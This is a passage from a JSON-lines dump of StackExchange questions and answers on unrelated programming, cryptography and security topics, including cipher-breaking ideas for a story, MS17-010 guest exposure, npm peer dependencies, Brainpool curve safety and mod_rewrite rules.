could easily be overlooked if one is using Big-Oh notation when analyzing the proofs. There are plenty of systems which are NP (vaguely meaning \"brutally hard to solve\"), but only for the worst case. We try our very best to avoid this happening in cryptography, but the whole point of attacks on cryptographic systems is that they do something we didn't think of on the day the algorithm is released.\nWhile this is Crypto, not WorldBuilding or Writing, I'd be remiss to fail to mention Sanderson's First Law of Magic:\n\nSanderson's First Law of Magics: An author's ability to solve conflict with magic is DIRECTLY PROPORTIONAL to how well the reader understands said magic.\n\nHis law of magic applies to technobabble too. You can get away with a lot, cryptographic wise, as long as you follow that law.\nAnd never underestimate the power of rubber hose cryptoanalysis!\nAnswer: Read Neal Stephenson's Cryptonomicon, then read discussion of a significant flaw in the algorithm constructed for the story. Read a bit about the background to analysis of Enigma (Wikipaedia is entirely adequate for this). Then go back to what you're doing :-)\nOne scenario is that the crypto is easy enough to solve by hand, provided that you know its flaw. And discovering its flaw is vastly easier if you have the computing power to wring every bit of statistical information out of the messages.\nAs a specific example, Cryptonomicon alludes to an unbroken Japanese cipher. However the gist of messages encoded in it could be determined, since the protagonist had sufficient (and unprecedented) computing power at his disposal to be able to detect the effects that the messages had (e.g. that the Japanese were suddenly looking for mining engineers).\nAnswer: To me, the idea related to a password and a KDF is the best to fit your scenario here. This would require that Party B, by some means, have learned which KDF was used to generate the key, while Party A did not have this information. Therefore Party A is doing a brute force search on the entire keyspace (which will take an eternity), while Party B is only doing a brute force search on the input passwords to the KDF.\nIf you want to add suspense, maybe Party B doesn't actually know the KDF that was used, but uses some clues about when and where the original encryption occurred to make an educated guess about which KDF was used. Then, the suspense comes from the fact that, while brute forcing passwords for the given KDF, there is no guarantee that they picked the right one.\nThis also has a nice narrative element because it shows the good guys thinking of something more clever than the bad guys, and taking a risk on it being true, which after 2 months of uncertainty happens to pay off. During the 4 years preceding, an intelligent Party A may have tried this same strategy as well with all the KDFs it thought could have been used for the files; Party B can use the fact that Party A has not been successful yet, to infer that the KDF is not one of the obvious choices, and thereby narrow down and make some theory of what kind of less common setup could have resulted in such a key.\nAnswer: Another option can be that, these files are encrypted using pairing-based IBE.\nPairing is an elliptic curve operation on 2 ECC points (from the same or different ECC curve) that results in a finite field element.\nIBE is identity-based encryption. The encryption key is the identity\/name of the recipiant, and decryption key is generated from a master private key using a key escrow mechanism.\nParty B can, by their technological supremacy, able to find that the ephemeral variable $k$ is static in all ciphertext (Sony used ECDSA for signing their PS3 console games, and the private key leaked because they failed to sign developer certificates with unpredictable $k$)\nParty B then find out there was an obfuscation applied to the curve parameters used in the pairing operation (I'm making this up, I'm not an expert in pairing-based cryptography, but that seems somewhat plausible to me), but by some chance, they find there was a 3rd curve that can be used to work around the obfuscation.\nFinally party B used some kind of quantum-classical computer combination, enumerated the 3rd curve, and managed to recover the master key, thus find out all of the escrowed decryption key.\nAnswer: You are asking for: \"An approach that will allow party B to succeed nonetheless.\"\nIt's probably not a good idea to present in technical terms the benefits of one algorithm over another as they exist in 2020. You said you're writing a story. You probably want it to make sense to a wide audience, but not look stupid like the password-cracking session in Clear and Present Danger (1994).\n\nParty A attacks the blind entropy of the password, and fails after expending huge amounts of computing resources (e.g. AWS EC2, perhaps using a stolen credit card).\nParty B attacks the human aspects of the password, and succeeds while expending far less computing resources (e.g. a monster gaming rig they build themselves).\n\nA strong password still needs to be memorable and convenient to type. A strong password is often required to have an upper case letter, a number, and a symbol. From past password cracking competitions I have studied, a sizable fraction of those passwords fit the pattern of starting with a capital letter, followed by all lower case letters, followed by a number, and ending with a symbol. In your story, party B designs its brute-force password cracker to only use that pattern, reducing the combinations of tries needed by a factor of several powers of ten.\nAnswer: To be honest, there doesn't have to be anything clever here. Simply trying brute force - i.e. try all combinations, on a good cipher will work for the narrative - that's because while it is true that you can't guarantee decryption before trying all keys, it is also true that Party B might win on the first try, or at least an 'early' one. So B starts later, but has better tech so is catching up, but can't guarantee a win until it comes (suspense as requested). The only issue with a good cipher is whether either of them would bother wasting their time - because it is unlikely either would succeed. But they could - and this is fiction.\n","meta":{"source":"crypto.stackexchange","title":"Cryptography elements needed for a story","dup_signals":{}},"subset":"stackexchange"} +{"text":"Is it safe to install MS17-010 unpatched OS as guest on patched host?\n\nQuestion: For example, these are unpatched old OS.\n\nWindows 98\nWindows 98 SE\nWindows ME\nWindows NT 4.0\nWindows 2000\n\nGiven that SMBv1 is not disabled on host but already patched.\nIs the unpatched guest OS itself still vulnerable on already patched host?\n\nWannaCry Ransomware: Patch released for Microsoft Windows XP, Server 2003 and 8\nhttps:\/\/soggi.org\/news\/WannaCry-Ransomware-Patch-for-Microsoft-Windows-XP-Server-2003-8.htm\nAnswer: If the guest is unpatched and has the vulnerability present then yes it is vulnerable. If the guest has any of its interfaces NAT'ed or Bridged to an unprotected network then the guest is exploitable via WannaCrypt.\n","meta":{"source":"security.stackexchange","title":"Is it safe to install MS17-010 unpatched OS as guest on patched host?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Problems to build info.plist property (React-native IOS)\n\nQuestion: I'm trying to run yarn ios to build my app.\nBut I have an exception:\n<code>ProcessInfoPlistFile \/Users\/flavio.luiz\/Library\/Developer\/Xcode\/DerivedData\/growerdiariesapp-fsidgwpdrbcpxubccmkpffoykvsz\/Build\/Products\/Debug-iphonesimulator\/growerdiariesapp.app\/Info.plist \/Users\/flavio.luiz\/Documents\/learning\/grower-diaries-app\/growerdiariesapp\/ios\/growerdiariesapp\/Info.plist (in target 'growerdiariesapp' from project 'growerdiariesapp')\n cd \/Users\/flavio.luiz\/Documents\/learning\/grower-diaries-app\/growerdiariesapp\/ios\n builtin-infoPlistUtility \/Users\/flavio.luiz\/Documents\/learning\/grower-diaries-app\/growerdiariesapp\/ios\/growerdiariesapp\/Info.plist -producttype com.apple.product-type.application -genpkginfo \/Users\/flavio.luiz\/Library\/Developer\/Xcode\/DerivedData\/growerdiariesapp-fsidgwpdrbcpxubccmkpffoykvsz\/Build\/Products\/Debug-iphonesimulator\/growerdiariesapp.app\/PkgInfo -expandbuildsettings -format binary -platform iphonesimulator -additionalcontentfile \/Users\/flavio.luiz\/Library\/Developer\/Xcode\/DerivedData\/growerdiariesapp-fsidgwpdrbcpxubccmkpffoykvsz\/Build\/Intermediates.noindex\/growerdiariesapp.build\/Debug-iphonesimulator\/growerdiariesapp.build\/LaunchScreen-SBPartialInfo.plist -additionalcontentfile \/Users\/flavio.luiz\/Library\/Developer\/Xcode\/DerivedData\/growerdiariesapp-fsidgwpdrbcpxubccmkpffoykvsz\/Build\/Intermediates.noindex\/growerdiariesapp.build\/Debug-iphonesimulator\/growerdiariesapp.build\/assetcatalog_generated_info.plist -o \/Users\/flavio.luiz\/Library\/Developer\/Xcode\/DerivedData\/growerdiariesapp-fsidgwpdrbcpxubccmkpffoykvsz\/Build\/Products\/Debug-iphonesimulator\/growerdiariesapp.app\/Info.plist\nerror: unable to read property list from file: \/Users\/flavio.luiz\/Documents\/learning\/grower-diaries-app\/growerdiariesapp\/ios\/growerdiariesapp\/Info.plist: The operation couldn't be completed. (XCBUtil.PropertyListConversionError error 1.) (in target 'growerdiariesapp' from project 'growerdiariesapp')\n<\/code>\ni think that could be a problem with the properties of the info list. I recently changed the file to remove react-native-vector-icons:\n<code><?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-\/\/Apple\/\/DTD PLIST 1.0\/\/EN\" \"http:\/\/www.apple.com\/DTDs\/PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n<dict>\n <key>CFBundleDevelopmentRegion<\/key>\n <string>en<\/string>\n <key>CFBundleDisplayName<\/key>\n <string>grower diaries<\/string>\n <key>CFBundleExecutable<\/key>\n <string>$(EXECUTABLE_NAME)<\/string>\n <key>CFBundleIdentifier<\/key>\n <string>$(PRODUCT_BUNDLE_IDENTIFIER)<\/string>\n <key>CFBundleInfoDictionaryVersion<\/key>\n <string>6.0<\/string>\n <key>CFBundleName<\/key>\n <string>$(PRODUCT_NAME)<\/string>\n <key>CFBundlePackageType<\/key>\n <string>APPL<\/string>\n <key>CFBundleShortVersionString<\/key>\n <string>1.0<\/string>\n <key>CFBundleSignature<\/key>\n <string>????<\/string>\n <key>CFBundleVersion<\/key>\n <string>1<\/string>\n <key>LSRequiresIPhoneOS<\/key>\n <true\/>\n <key>NSAppTransportSecurity<\/key>\n <dict>\n <key>NSExceptionDomains<\/key>\n <dict>\n <key>localhost<\/key>\n <dict>\n <key>NSExceptionAllowsInsecureHTTPLoads<\/key>\n <true\/>\n <\/dict>\n <\/dict>\n <\/dict>\n <key>NSLocationWhenInUseUsageDescription<\/key>\n <string\/>\n <key>UILaunchStoryboardName<\/key>\n <string>LaunchScreen<\/string>\n <key>UIRequiredDeviceCapabilities<\/key>\n <array>\n <string>armv7<\/string>\n <\/array>\n <key>UISupportedInterfaceOrientations<\/key>\n <array>\n <string>UIInterfaceOrientationPortrait<\/string>\n <string>UIInterfaceOrientationLandscapeLeft<\/string>\n <string>UIInterfaceOrientationLandscapeRight<\/string>\n <\/array>\n <key>UIViewControllerBasedStatusBarAppearance<\/key>\n <false\/>\n <key>UIAppFonts<\/key>\n<\/dict>\n<\/plist>\n<\/code>\nI just tried <code>plutil info.plist<\/code> and that is the answer:\n<code>info.plist: Value missing for key inside <dict> at line 55\n<\/code>\nDoes anybody know how to solve this problem?\nComment: Which line is line 55? Where does it point to?\nAnswer: I got it.\nI just remove UIAppFonts key from Info.plist and it worked. Key are declared but has no value reference.\n","meta":{"source":"stackoverflow","title":"Problems to build info.plist property (React-native IOS)","dup_signals":{}},"subset":"stackexchange"} +{"text":"Using react-native components for react web\n\nQuestion: How can we use share components between react-native and react web projects. I have read react native can be derived from react. How is it possible to use same js code between two projects (fully or partially) ?\nAnswer: Take a look at the <code>react-native-web<\/code> library. It's pretty good:\nhttps:\/\/github.com\/necolas\/react-native-web\nAs long as you only use react native components, e.g. <code>View<\/code> instead of <code>div<\/code>, and <code>Text<\/code> instead of <code>p<\/code> etc, you'll be able to share view components between your app and website. Then you can pass down all the data from API calls etc as props from within the individual mobile app\/website code.\nIn my projects I have a <code>common<\/code> folder that contains all these shared view components, and only put the platform specific code inside <code>mobile<\/code> or <code>web-app<\/code>. It works pretty well that way.\n","meta":{"source":"stackoverflow","title":"Using react-native components for react web","dup_signals":{}},"subset":"stackexchange"} +{"text":"Meteor: subscribe to external datasource\n\nQuestion: In Meteor I want to subscribe to events outside meteor and insert any updates in a collection, i.e.\n<code>external_subscriber.subscribe(\"some data\");\n\nexternal_subscriber.on('message', function(data) {\n meteor_collection.insert({newdata:data.toString()});\n}));\n<\/code>\nMeteor tells me to run this in a fibre. Normally I would use async and futures, but this is not an async call. How to subscribe to external data and insert results in collections?\nAnswer: Enclose call to meteor collection into new fiber as shown as follows- \n<code>external_subscriber.on('message', function(data) {\n new Fiber(()->\n meteor_collection.insert({newdata:data.toString()});\n ).run()\n}));\n<\/code>\nThis should work\n","meta":{"source":"stackoverflow","title":"Meteor: subscribe to external datasource","dup_signals":{}},"subset":"stackexchange"} +{"text":"Vibrate notification only on wearable device\n\nQuestion: Is it possible to do a vibrate notification on a wearable device but without set any sound or vibration on the phone? I want to allow to vibrate the watch but not the phone. There is a settings in the android wear app but it's a general settings and not app specific.\nAnswer: Yes, you just create notification on the Wear device itself (use Message API to trigger it), and it will be shown only on the smartwatch, so if you set vibrations for it - only smartwatch will vibrate.\nComment: I agree with you but I found a very simple solution.\nAnswer: There is not similar feature in Android. Developer reference doesn't provide any information about function you described. I think, you should suggest user to decide about vibrations and notifications.\nAnswer: I simply used a silent.mp3 file and I set it as notification sound :)\nAnswer: \nyou must set permision in Androidmanifest.xml\nuses-permission android:name=\"android.permission.VIBRATE\" \nAdd Code (I have a button when you click on phone, A notification and vibrate will active on watch) \n<code> Button wearButton = (Button)findViewById(R.id.wearButton);\n wearButton.setOnClickListener(new View.OnClickListener() {\n @Override\n public void onClick(View v) {\n\n int notificationId = 001;\n Bitmap bitmap = BitmapFactory.decodeResource(getResources(), R.drawable.ic_background);\n NotificationCompat.BigPictureStyle style = new NotificationCompat.BigPictureStyle();\n style.bigPicture(bitmap);\n\n \/\/big image\n NotificationCompat.Builder notificationBuilder =\n new NotificationCompat.Builder(MainActivity.this)\n\n .setSmallIcon(R.drawable.baby)\n .setContentTitle(\"Title\")\n .setContentText(\"Android Wear Notification\");\n notificationBuilder.setStyle(style);\n\n \/\/Vibration\n notificationBuilder.setVibrate(new long[]{1000, 1000, 1000, 1000, 1000, 1000, 1000});\n\n \/\/Ton\n \/\/ notificationBuilder.setSound(R.);\n\n NotificationManagerCompat notificationManager =\n NotificationManagerCompat.from(MainActivity.this);\n notificationManager.notify(notificationId, notificationBuilder.build());\n }\n});\n<\/code>\n\nI have a complete project if you wan you can download \nhttps:\/\/app.box.com\/s\/veb68n0uzxcmotyo0rmfrxgyoig032lc\n","meta":{"source":"stackoverflow","title":"Vibrate notification only on wearable device","dup_signals":{}},"subset":"stackexchange"} +{"text":"how to update data in mysql when user share post on facebook using Facebook SDK for JavaScript\n\nQuestion: I want to update my database when user share post on fb. I am using Facebook SDK for JAVASCRIPT.\nMy Code Is:-\n<code> <script>\n document.getElementById('shareBtn').onclick = function() {\n FB.ui({\n method: 'share',\n display: 'popup',\n href: 'url goes here',\n }, function(response){\n if (response && response.post_id) {\n \/\/ajax code goes here for database update\n } else {\n alert('oops post was not published');\n }\n });\n }\n <\/script>\n<\/code>\nButton Code-\n<code> <div class=\"fb-share-button\" \n data-href=\"url goes here\" \n data-layout=\"button\" data-size=\"large\">\n <\/div>\n<\/code>\nI am able to share the post but how to update the mysql data when user successfully sharesthe post \nComment: see my answer. what is the use case for this btw? why do you want to update the database if the user shared something?\nComment: That is not even allowed ... you can not reward the user for sharing in any way. You should go read [Platform Policy](https:\/\/developers.facebook.com\/policy) before you proceed.\nComment: @luschn actually i am working on a project which rewards the user when the user successfully share the posts\nAnswer: You will only know if the user shared something if you authorize the user with the <code>publish_actions<\/code> permission. That permission needs to get reviewed by Facebook, and Facebook will not approve it just for this, i\u00b4m afraid.\nIn other words: It is not possible.\n","meta":{"source":"stackoverflow","title":"how to update data in mysql when user share post on facebook using Facebook SDK for JavaScript","dup_signals":{}},"subset":"stackexchange"} +{"text":"Trying to insert line break into HTML with vanilla JS\n\nQuestion: I've been coding with JavaScript for a while now and I just started using the features for adding HTML elements through JavaScript and I have a button that adds two input fields each time it's pressed. The first time the user presses the button I want the element pushed down 250px from the top, and each time have about 20px spacing, but instead of that, well you'll see when you run the code. This question not the same as append many elements because its not my real issue, my real issue is trying to get each pair of input values separated by 20px from the other one each time the button is pressed.\n\n<code>let addN = document.getElementById(\"adda\");\nlet margin = 250;\n\naddN.addEventListener(\"click\", () => {\n let newCoordsX = document.createElement('input');\n let newCoordsY = document.createElement('input');\n newCoordsX.placeholder = \"X value\";\n newCoordsY.placeholder = \"Y value\";\n newCoordsX.style.marginTop = margin + \"px\";\n document.body.appendChild(newCoordsX);\n document.body.appendChild(newCoordsY);\n});<\/code>\n<code>#adda {\n position:absolute;\n top:140px;\n \/*left:-1300px;*\/\n left: 0px;\n width:180px;\n height:40px;\n padding:5px;\n background-color:rgb(171, 202, 252);\n border-radius:15px;\n}\n\n#add {\n position:absolute;\n color:white;\n font-weight:bold;\n font-size:21px;\n left:14px;\n top:10px;\n}\n\n#adda:hover{\n cursor:pointer;\n background-color:rgb(191, 215, 252);\n}<\/code>\n<code><div id=\"adda\">\n <div id=\"add\">Add another node<\/div>\n<\/div><\/code>\nComment: @Mukyuu that's just a side problem my real problem is getting the two inputs to have a line break between them each time\nComment: did you tried `margin-left:20px;` for space\nAnswer: You can change the <code>display<\/code> of inputs to <code>block<\/code>\n\n<code>let addN = document.getElementById(\"adda\");\nlet margin = 250;\n\naddN.addEventListener(\"click\", () => {\n let newCoordsX = document.createElement('input');\n let newCoordsY = document.createElement('input');\n newCoordsX.placeholder = \"X value\";\n newCoordsY.placeholder = \"Y value\";\n newCoordsX.style.marginTop = margin + \"px\";\n newCoordsX.style.display = \"block\"\n newCoordsY.style.display = \"block\"\n document.body.appendChild(newCoordsX);\n document.body.appendChild(newCoordsY);\n \n});<\/code>\n<code>#adda {\n position:absolute;\n top:140px;\n \/*left:-1300px;*\/\n left: 0px;\n width:180px;\n height:40px;\n padding:5px;\n background-color:rgb(171, 202, 252);\n border-radius:15px;\n}\n\n#add {\n position:absolute;\n color:white;\n font-weight:bold;\n font-size:21px;\n left:14px;\n top:10px;\n}\n\n#adda:hover{\n cursor:pointer;\n background-color:rgb(191, 215, 252);\n}<\/code>\n<code><div id=\"adda\">\n <div id=\"add\">Add another node<\/div>\n<\/div><\/code>\n","meta":{"source":"stackoverflow","title":"Trying to insert line break into HTML with vanilla JS","dup_signals":{}},"subset":"stackexchange"} +{"text":"Country Blocking\n\nQuestion: I use a Meraki firewall and want to block outside attack attempts. Is there a list of countries that are known to be malicious? I want to load them into the system and GEO block them. I know that some legitimate sites have hosting in another country. Can this pose an issue? Any suggestions would be highly appreciated. I want to ensure we have a secure outside perimeter. \nComment: So, does this answer your question: https:\/\/security.stackexchange.com\/questions\/72230\/is-blocking-a-countrys-access-to-a-website-a-good-measure-to-avoid-hackers-from\nComment: https:\/\/blogs.akamai.com\/sitr\/2018\/07\/geographic-normalization-of-web-attack-data.html I found this to be a fun look at some of the data out there.\nComment: Thanks for sharing :) that was informational. I am looking for something like a list of regions or IP's I can plug into the ruling.\nComment: The lists of historically cyber aggressive nations are very, very easy to look up. I'm curious about your approach, though. Why blacklist certain countries? Are you expecting random outside connections to be made through your router? Are you wanting to block outgoing connections?\nComment: Like I know China and Russia is an obvious one.. I see no reason why my users data should be beaconing to those countries or weird foreign IP's in general since we only operate within the US. I want to block foreign IP's from performing nmap scans etc..\nComment: So ... it's a corporate router and you want to block both incoming and outgoing connections to these countries? If so, those are important details. And I believe we have a duplicate already asked.\nComment: Yes, this is on a corporate network.\nComment: That shed some light.. This is something I have to further think about and decide. But the obvious country I should block is China, Russia, etc.\nAnswer: Filtering entire countries' IP ranges will significantly cut down on the amount of malicious traffic coming from actors in those countries, but it will almost 100% ENTIRELY block legitimate users from those countries.\nAlso, while this is a decent approach to cope with automated scans, it does nothing against a human attacker, who will simply VPN their traffic.\nIP blocking is best used for time-sensitive operations, like defending against a sudden spike of malicious traffic out of an IP range. Since it can be easily overcome, it's not an actual 'defense'; it's just a roadblock meant to momentarily impede, deter, or annoy.\n","meta":{"source":"security.stackexchange","title":"Country Blocking","dup_signals":{}},"subset":"stackexchange"} +{"text":"Resolve peer dependency of aliased package breaks npm install\n\nQuestion: I'm trying to test my npm package against different versions of React. So I set up aliases for older version in <code>package.json<\/code>:\n<code>{\n \"name\": \"gatsby-plugin-i18n-l10n\",\n [..]\n \"peerDependencies\": {\n \"gatsby\": \"^4.x\",\n \"gatsby-source-filesystem\": \"^4.x\",\n \"react-helmet\": \"^6.1.x\",\n \"react-intl\": \"^5.20.x\"\n },\n \"peerDependenciesMeta\": {\n \"gatsby-source-filesystem\": {\n \"optional\": true\n }\n },\n \"devDependencies\": {\n [..]\n \"react\": \"18.0.0\",\n \"react-17\": \"npm:firstname.lastname@example.com\",\n \"react-dom\": \"18.0.0\",\n \"react-dom-17\": \"npm:email@example.com\",\n [..]\n \"react-test-renderer\": \"18.0.0\",\n \"react-test-renderer-17\": \"npm:firstname.lastname@example.com\",\n [..]\n },\n \"dependencies\": {\n \"limax\": \"^3.0.0\",\n \"path-browserify\": \"^1.0.1\"\n }\n}\n<\/code>\nWhile researching this I've found another question which is similar NPM: Link peer dependency to package alias, which works, but <code>npm install<\/code> still throws the following error:\n<code>npm ERR! ERESOLVE unable to resolve dependency tree\nnpm ERR! \nnpm ERR! While resolving: firstname.lastname@example.com\nnpm ERR! Found: email@example.com\nnpm ERR! node_modules\/react\nnpm ERR! dev react@\"18.0.0\" from the root project\nnpm ERR! \nnpm ERR! Could not resolve dependency:\nnpm ERR! peer react@\"17.0.2\" from email@example.com\nnpm ERR! node_modules\/react-dom-17\nnpm ERR! dev react-dom-17@\"npm:firstname.lastname@example.com\" from the root project\nnpm ERR! \nnpm ERR! Fix the upstream dependency conflict, or retry\nnpm ERR! this command with --force, or --legacy-peer-deps\nnpm ERR! to accept an incorrect (and potentially broken) dependency resolution.\n<\/code>\nHow can I make <code>npm install<\/code> work again and help it to resolve the packages by itself?\nAnswer: *I rewrote my comment as I did not get the problem at first\nIt is possible, but you will need to manually edit the package-lock file of NPM.\nIn steps as follows:\n\nLeave only the legacy dependencies in the package.json file like so:\n\n<code> {\n \"name\": \"npmpeerstest\",\n \"version\": \"1.0.0\",\n \"description\": \"\",\n \"type\": \"module\",\n \"main\": \"index.js\",\n \"scripts\": {\n \"test\": \"echo \\\"Error: no test specified\\\" && exit 1\"\n },\n \"author\": \"\",\n \"license\": \"ISC\",\n \"devDependencies\": {\n \"@legacy\/react\": \"npm:react@^17.0.2\",\n \"@legacy\/react-dom\": \"npm:react-dom@^17.0.2\"\n }\n }\n<\/code>\n\nRun npm install, it should pass ok\nEdit package-lock.json from this:\n\n<code>\"node_modules\/@legacy\/react-dom\": {\n \"name\": \"react-dom\",\n \"version\": \"17.0.2\",\n \"resolved\": \"https:\/\/registry.npmjs.org\/react-dom\/-\/react-dom-17.0.2.tgz\",\n \"integrity\": \"sha512-s4h96KtLDUQlsENhMn1ar8t2bEa+q\/YAtj8pPPdIjPDGBDIVNsrD9aXNWqspUe6AzKCIG0C1HZZLqLV7qpOBGA==\",\n \"dev\": true,\n \"dependencies\": {\n \"loose-envify\": \"^1.1.0\",\n \"object-assign\": \"^4.1.1\",\n \"scheduler\": \"^0.20.2\"\n },\n \"peerDependencies\": {\n \"react\": \"17.0.2\"\n }\n },\n<\/code>\nto:\n<code>\"node_modules\/@legacy\/react-dom\": {\n \"name\": \"react-dom\",\n \"version\": \"17.0.2\",\n \"resolved\": \"https:\/\/registry.npmjs.org\/react-dom\/-\/react-dom-17.0.2.tgz\",\n \"integrity\": \"sha512-s4h96KtLDUQlsENhMn1ar8t2bEa+q\/YAtj8pPPdIjPDGBDIVNsrD9aXNWqspUe6AzKCIG0C1HZZLqLV7qpOBGA==\",\n \"dev\": true,\n \"dependencies\": {\n \"loose-envify\": \"^1.1.0\",\n \"object-assign\": \"^4.1.1\",\n \"scheduler\": \"^0.20.2\"\n },\n \"peerDependencies\": {\n \"@legacy\/react\": \"17.0.2\"\n }\n },\n<\/code>\nNotice that we need to manually set the react dependency to use the @legacy\/react instead of react\n\nAdd new dependencies to package.json like so:\n\n<code>{\n \"name\": \"npmpeerstest\",\n \"version\": \"1.0.0\",\n \"description\": \"\",\n \"type\": \"module\",\n \"main\": \"index.js\",\n \"scripts\": {\n \"test\": \"echo \\\"Error: no test specified\\\" && exit 1\"\n },\n \"author\": \"\",\n \"license\": \"ISC\",\n \"devDependencies\": {\n \"@legacy\/react\": \"npm:react@^17.0.2\",\n \"@legacy\/react-dom\": \"npm:react-dom@^17.0.2\",\n \"react\": \"18.0.0\",\n \"react-dom\": \"18.0.0\"\n }\n}\n<\/code>\n\nRun npm install, and all should pass\n\n*do not forget to commit the package-lock.json with the modification or other installs will fail\nComment: Thank you for your answer. It should work, but I should not edit `package-lock.json` by hand.\nComment: Well, then I see one option: to republish react in a private npm registry (or just a private package in npm) with a prefux, and then republish react-dom with a modified dependency to your republished react instead of the real react again with a prefix.\n","meta":{"source":"stackoverflow","title":"Resolve peer dependency of aliased package breaks npm install","dup_signals":{}},"subset":"stackexchange"} +{"text":"Is either brainpoolP320r1 or brainpoolP320t1 a SafeCurve?\n\nQuestion: Not all elliptic curves are safe to use for cryptography, especially from an ECC safety perspective. The site http:\/\/safecurves.cr.yp.to\/index.html shows that two tested Brainpool curves, brainpoolP256t1 and brainpoolP384t1, are not ECC security safe even though they are ECDLP safe. Not all the Brainpool curves were evaluated however.\nI am curious if the 320-bit curves brainpoolP320r1 and brainpoolP320t1 pass these safety tests. These curves are defined in RFC5639.\nI see the Sage verification script is provided, http:\/\/safecurves.cr.yp.to\/verify.html. It requires many parameters to set it up for testing these curves, such as a list of all the prime divisors of q-1 for each q in the list. I'm not sure how to correctly do this.\nHas any crypto experts or enthusiast verified 320-bit curves or is there an easier way to to perform the testing (such a a program that does not require so much complex setup)?\nAlternatively could some help explain how to correctly setup the parameters for the Sage script to test these curves (or any curves in general).\nThe instructions are:\nEach directory contains the following files:\n<code>p: the field prime, in decimal.\nl: the prime order of the base point, in decimal.\nx1: the x-coordinate of the base point.\ny1: the y-coordinate of the base point.\nx0: the x-coordinate of a point generating the entire curve.\ny0: the y-coordinate of a point generating the entire curve.\nshape: the curve shape, either shortw or montgomery or edwards.\na and b, if the curve shape is shortw: the coefficients in the short Weierstrass equation.\nA and B, if the curve shape is montgomery: the coefficients in the Montgomery equation.\nd, if the curve shape is edwards: the coefficient in the Edwards equation.\nprimes: all prime divisors of of p, the curve order p+1-t, the twist order p+1+t, and t^2-4p; and, recursively, all prime divisors of q-1 for each q in the list.\n<\/code>\nAnd the curves are defined as: -\nCurve-ID: brainpoolP320r1\n<code> p = D35E472036BC4FB7E13C785ED201E065F98FCFA6F6F40DEF4F92B9EC7893EC\n 28FCD412B1F1B32E27\n\n A = 3EE30B568FBAB0F883CCEBD46D3F3BB8A2A73513F5EB79DA66190EB085FFA9\n F492F375A97D860EB4\n\n B = 520883949DFDBC42D3AD198640688A6FE13F41349554B49ACC31DCCD884539\n 816F5EB4AC8FB1F1A6\n\n x = 43BD7E9AFB53D8B85289BCC48EE5BFE6F20137D10A087EB6E7871E2A10A599\n C710AF8D0D39E20611\n\n y = 14FDD05545EC1CC8AB4093247F77275E0743FFED117182EAA9C77877AAAC6A\n C7D35245D1692E8EE1\n\n q = D35E472036BC4FB7E13C785ED201E065F98FCFA5B68F12A32D482EC7EE8658\n E98691555B44C59311\n\n h = 1\n<\/code>\nCurve-ID: brainpoolP320t1 #Twisted curve\n<code> Z = 15F75CAF668077F7E85B42EB01F0A81FF56ECD6191D55CB82B7D861458A18F\n EFC3E5AB7496F3C7B1\n\n A = D35E472036BC4FB7E13C785ED201E065F98FCFA6F6F40DEF4F92B9EC7893EC\n 28FCD412B1F1B32E24\n\n B = A7F561E038EB1ED560B3D147DB782013064C19F27ED27C6780AAF77FB8A547\n CEB5B4FEF422340353\n\n x = 925BE9FB01AFC6FB4D3E7D4990010F813408AB106C4F09CB7EE07868CC136F\n FF3357F624A21BED52\n\n y = 63BA3A7A27483EBF6671DBEF7ABB30EBEE084E58A0B077AD42A5A0989D1EE7\n 1B1B9BC0455FB0D2C3\n\n q = D35E472036BC4FB7E13C785ED201E065F98FCFA5B68F12A32D482EC7EE8658\n E98691555B44C59311\n\n h = 1\n<\/code>\nWhere:\n<code> p is the prime specifying the base field.\n\n A and B are the coefficients of the equation y^2 = x^3 + A*x + B\n mod p defining the elliptic curve.\n\n G = (x,y) is the base point, i.e., a point in E of prime order,\n with x and y being its x- and y-coordinates, respectively.\n\n q is the prime order of the group generated by G.\n\n h is the cofactor of G in E, i.e., #E(GF(p))\/q.\n\n For the twisted curve, we also give the coefficient Z that defines\n the isomorphism F (see requirement 3 in Section 2.2).\n<\/code>\nSo for verify.sage (LHS is files for verify sage, RHS is from RFC):\n<code> p = int(p)\n l = int(q) # I think, IIUC\n x1 = int(x)\n y1 = int(y)\n x0 = ???\n y0 = ???\n shape = ?? # for brainpoolP320r1 either \"shortw\" or \"montgomery\"? For brainpoolP320t1 \"edwards\"?\n a = A\n b = B\n A = A\n B = B\n d = int(Z) # for brainpoolP320t1 only\n primes = ???\n<\/code>\nNote: where I say int(x) it's to convert for hexadecimal representation to decimal. The result is what would be saved in the text file for verify.sage to use.\nI'm afraid I understand ECC, EC, and maths too little to be able to do this.\nI will be grateful if someone would kindly help me. \n\nEdit: I think, because this question was migrated, it does not show up in my profile as a question I asked, even though I can edit the question. I also cannot accept the answer below that clearly states neither are safe curves. If possible can a mod either permit me to accept the answer or accept it on my behalf?\nComment: There's enough of an \"applied security\" aspect to it that this question also fits here.\nAnswer: A curve with cofactor 1, like all Brainpool curves, cannot possibly satisfy the SafeCurves criteria, so the answer to your question is no.\nWhether that means that they are actually \"unsafe\" for use in practice is debatable. I think it would be fair to say that implementing such curves in a secure way is perfectly doable in practice, but it's trickier to do so than with one of the SafeCurves, and performance will suffer as a result.\nComment: The generation of the parameters is not fully according to SafeCurve standards either. It's considered better than the (completely unspecified) method that NIST \/ Certicom curves have used to generate the curves, but it cannot be verified that there was no attempt to steer the values one way or another - it's just *likely* that they haven't been tampered with.\n","meta":{"source":"crypto.stackexchange","title":"Is either brainpoolP320r1 or brainpoolP320t1 a SafeCurve?","dup_signals":{}},"subset":"stackexchange"} +{"text":"mod_rewrite if file in subdirectory does not exist\n\nQuestion: i have never used <code>mod_rewrite<\/code> before, so I am struggling with setting up a proper rules for my use case.\nI have a URL looking like that: <code>domain.com\/pict\/123456<\/code>\ndirectory structure is like so:\n<code>\/pict\/\n |-- autogenerated\/\n |-- 12345.png\n |-- 87654.png\n |-- gen.php\n |-- .htaccess<\/code>\nand what I'd like to achieve is:\nIf <code>12345.png<\/code> does not exist in <code>autogenerated<\/code>, \nrewrite URL to <code>gen.php?id=12345<\/code>\nelse serve the <code>autogenerated\/12345.png<\/code> file\nI have tried various solutions found on the internet (as well as most of Stackoverflow answers - all to no avail).\nmy <code>.htaccess<\/code> file looks like so:\n<code><IfModule mod_rewrite.c>\n\nRewriteEngine On\n\nRewriteCond autogenerated\/%{REQUEST_FILENAME}.png -f\nRewriteRule ^(.+)$ autogenerated\/$1.png [L]\n\nRewriteRule ^(.*)$ generate.php?id=$1 [QSA,L]\n\n<\/IfModule>\n<\/code>\nI have also tried changing the 